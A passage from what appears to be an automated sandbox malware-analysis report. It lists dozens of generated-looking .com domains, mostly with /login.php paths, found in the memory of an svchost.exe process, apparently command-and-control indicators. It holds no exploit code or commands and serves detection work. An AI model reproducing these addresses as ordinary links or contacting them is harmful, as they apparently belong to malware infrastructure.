00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681672330.00000000060E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqah.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600414604.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqub.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyraw.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639974314.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643724869.00000000029AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyruh.com/login.php
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvab.com/
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvab.com/login.php
    Source: svchost.exe, 00000002.00000003.1579481931.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562173607.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577836262.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559111148.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583773094.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585285219.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1554779210.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591194658.0000000006008000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561263694.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573220991.000000000600B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyzez.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galydoz.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106093549.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090770576.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2091016673.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/login.php3
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461024181.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460509147.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461420985.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyhiw.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galypyh.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2620626150.0000000006148000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573890661.0000000006148000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyqaz.com/login.php
    Source: svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077691101.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyqoh.com/
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579923926.000000000615C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580902534.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575937729.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576857106.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576872039.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyros.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyryz.com/login.php
    Source: svchost.exe, 00000002.00000003.1820622823.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820638781.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546391419.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvas.com/
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550034338.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546693862.000000000B457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvas.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvaw.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyzeb.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganycuh.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydiw.com/login.php
    Source: svchost.exe, 00000002.00000003.1841502213.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841504956.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyfes.com/
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyfes.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637675576.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638312778.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044910027.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2041626370.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyfuz.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhuh.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550752582.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548763256.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824832708.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1829965352.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganynyb.com/login.php
    Source: svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663699181.00000000060FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2586656431.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417918373.000000000612C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypih.com/
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677975921.0000000003A84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypih.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyqib.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084205455.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660127068.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyrew.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyrys.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyrys.com/login.phpc
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyvoz.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyzub.com/login.php
    Source: svchost.exe, 00000002.00000002.2675178406.000000000B454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyzuz.com/login.php
    Source: svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677832780.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqycos.com/login.php
